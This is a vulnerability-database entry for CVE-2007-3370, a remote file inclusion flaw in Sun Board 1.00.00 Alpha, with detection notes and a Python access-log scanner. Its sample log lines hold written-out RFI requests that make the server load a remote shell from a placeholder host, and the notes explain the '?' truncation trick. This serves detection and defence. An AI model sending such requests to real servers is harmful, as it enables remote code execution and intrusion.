CVE-2007-3370
Published 2007-06-22
Priority: P3 (56, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 74.53% (99.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath parameter to include.php or (2) the dir parameter to skin/board/default/doctype.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kim_kyoung_min | sun_board | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting /include.php with a user-supplied `sunPath` parameter containing a remote URL (e.g., http:// or ftp://), the classic RFI pattern used to load a remote shell.
- Monitor HTTP requests targeting /skin/board/default/doctype.php with a user-supplied `dir` parameter containing a remote URL, the second RFI vector in Sun Board 1.00.00 Alpha.
- The exploit appends a null-terminating `?` after the remote file URL (e.g., Shell.txt?) to truncate the appended PHP extension; detect query strings in `sunPath` or `dir` parameters that end with `?` or contain remote URLs.
- The vulnerable code directly passes the `sunPath` parameter into a `require` statement without sanitization; look for PHP `require`/`require_once` calls using unsanitized GET/POST parameters in Sun Board installations.
- The RFI vulnerability is only exploitable if PHP's `allow_url_include` (or `allow_url_fopen`) directive is enabled on the target server, which is required for remote file inclusion via `require`/`require_once`.
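As an added example (not from this page or from Sun Board's own code), the following Python scans web-server access-log lines for the two request patterns described above: a watched endpoint whose `sunPath` or `dir` parameter carries a remote URL or ends with the extension-truncating `?`. The log entries and the host `attacker.invalid` are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> parameter pairs named in the CVE-2007-3370 advisory.
WATCHED = {
    "/include.php": "sunPath",
    "/skin/board/default/doctype.php": "dir",
}
# Remote schemes an RFI payload would use to pull code from another host.
REMOTE_SCHEME = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)
# Request line inside an Apache/nginx combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target):
    """Return a reason string if the request target matches the RFI pattern, else None."""
    parts = urlsplit(target)  # splits on the first '?', so a trailing '?' stays in the value
    param = next((p for path, p in WATCHED.items() if parts.path.endswith(path)), None)
    if param is None:
        return None  # other endpoints are out of scope for this CVE-specific check
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        value = value.strip()  # parse_qs already decodes %3A%2F%2F and %3F
        if REMOTE_SCHEME.match(value):
            return f"{param} points at a remote URL: {value}"
        if value.endswith("?"):
            return f"{param} ends with '?' (extension-truncation marker): {value}"
    return None


def scan_access_log(lines):
    """Return (line_number, reason) for each entry matching the CVE-2007-3370 RFI pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m:
            reason = inspect_request(m.group("target"))
            if reason:
                hits.append((n, reason))
    return hits


# Constructed sample entries (not real traffic); attacker.invalid is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jun/2007:10:01:02 +0000] "GET /include.php?sunPath=skins/default HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Jun/2007:10:01:07 +0000] "GET /include.php?sunPath=http://attacker.invalid/shell.txt? HTTP/1.1" 200 88',
    '203.0.113.9 - - [22/Jun/2007:10:01:09 +0000] "GET /skin/board/default/doctype.php?dir=ftp%3A%2F%2Fattacker.invalid%2Fs.txt%3F HTTP/1.1" 200 88',
    '198.51.100.2 - - [22/Jun/2007:10:02:00 +0000] "GET /index.php?page=http://attacker.invalid/x.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for n, reason in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The fourth sample line is deliberately left unflagged: it is a generic RFI attempt against an endpoint this CVE does not cover, which shows the scoping of the check.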
No detection rules found.
No writeups or analysis indexed.
References:
- http://osvdb.org/36281
- http://osvdb.org/36282
- http://www.securityfocus.com/bid/24588
- http://www.vupen.com/english/advisories/2007/2307
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35006
- https://www.exploit-db.com/exploits/4091